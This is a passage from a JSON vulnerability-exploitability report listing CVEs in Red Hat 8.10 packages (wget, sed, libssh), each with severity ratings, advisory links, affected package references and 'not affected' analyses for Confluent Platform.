          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/wget@1.19.5-12.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-5958",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        367
      ],
      "description": "When sed is invoked with both -i (in-place edit) and --follow-symlinks, the function open_next_file() performs two separate, non-atomic filesystem operations on the same path: \n1. resolves symlink to its target and stores\u00a0the resolved path for determining when output is written,\n2. opens the original symlink path\u00a0(not the resolved one) to read the file. \nBetween these two calls there is a race window. If an attacker atomically replaces the symlink with a different target during that window, sed will: read content from the new (attacker-chosen) symlink target and write the processed result to the path recorded in step 1.\u00a0This can lead to arbitrary file overwrite with attacker-controlled content in the context of the sed process.\n\n\nThis issue was fixed in version 4.10.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-5958"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/05/13/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-5958"
        },
        {
          "url": "https://cert.pl/en/posts/2026/04/CVE-2026-5958"
        },
        {
          "url": "https://github.com/advisories/GHSA-9r7w-j29g-xqx8"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-5958"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8229-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-5958"
        },
        {
          "url": "https://www.gnu.org/software/sed"
        },
        {
          "url": "https://www.gnu.org/software/sed/"
        }
      ],
      "published": "2026-04-20T12:16:08+00:00",
      "updated": "2026-06-17T10:59:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "4.5-5.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/sed@4.5-5.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-59843",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        835,
        400
      ],
      "description": "A flaw was found in libssh. A remote authenticated peer can advertise a zero maximum packet size in SSH_MSG_CHANNEL_OPEN, causing later channel writes to loop indefinitely and consume CPU, leading to denial of service.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59843"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59843"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498176"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59843.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59843"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59843"
        }
      ],
      "published": "2026-07-21T12:18:57+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59844",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "oracle-oval"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        789
      ],
      "description": "A flaw was found in libssh. A remote authenticated client can issue SSH_FXP_READ requests with an arbitrarily large length, causing a libssh SFTP server to allocate excessive memory and potentially exhaust it through repeated requests.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59844"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:42922"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:55855"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59844"
        },
        {
          "url": "https://bugzilla.redhat.com/2498168"
        },
        {
          "url": "https://bugzilla.redhat.com/2498176"
        },
        {
          "url": "https://bugzilla.redhat.com/2498177"
        },
        {
          "url": "https://bugzilla.redhat.com/2498178"
        },
        {
          "url": "https://bugzilla.redhat.com/2498179"
        },
        {
          "url": "https://bugzilla.redhat.com/2498180"
        },
        {
          "url": "https://bugzilla.redhat.com/2498181"
        },
        {
          "url": "https://bugzilla.redhat.com/2498182"
        },
        {
          "url": "https://bugzilla.redhat.com/2498183"
        },
        {
          "url": "https://bugzilla.redhat.com/2498184"
        },
        {
          "url": "https://bugzilla.redhat.com/2499049"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2498177"
        },
        {
          "url": "https://errata.almalinux.org/10/ALSA-2026-55855.html"
        },
        {
          "url": "https://linux.oracle.com/cve/CVE-2026-59844.html"
        },
        {
          "url": "https://linux.oracle.com/errata/ELSA-2026-55855.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59844"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59844"
        }
      ],
      "published": "2026-07-21T12:18:57+00:00",
      "updated": "2026-08-17T22:17:15+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "0.9.6-16.el8_10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6970fc8b-55d8-4050-979c-f6f4d40ed9ff/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6910ef74-35b2-4d36-9a56-913d336f051c/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:630f98e9-f969-4c27-8729-fa7219b835ad/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e568c853-b366-407b-8100-89144534cac3/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ef420c39-411b-4612-ad53-68dd79caba45/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh-config@0.9.6-16.el8_10?arch=noarch&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9666cea-301d-428d-9d31-130e9178f843/1#pkg:rpm/redhat/libssh@0.9.6-16.el8_10?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59845",
      "ratings": [
        {
          "source": {
            "name": "alma"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "nvd"
          },
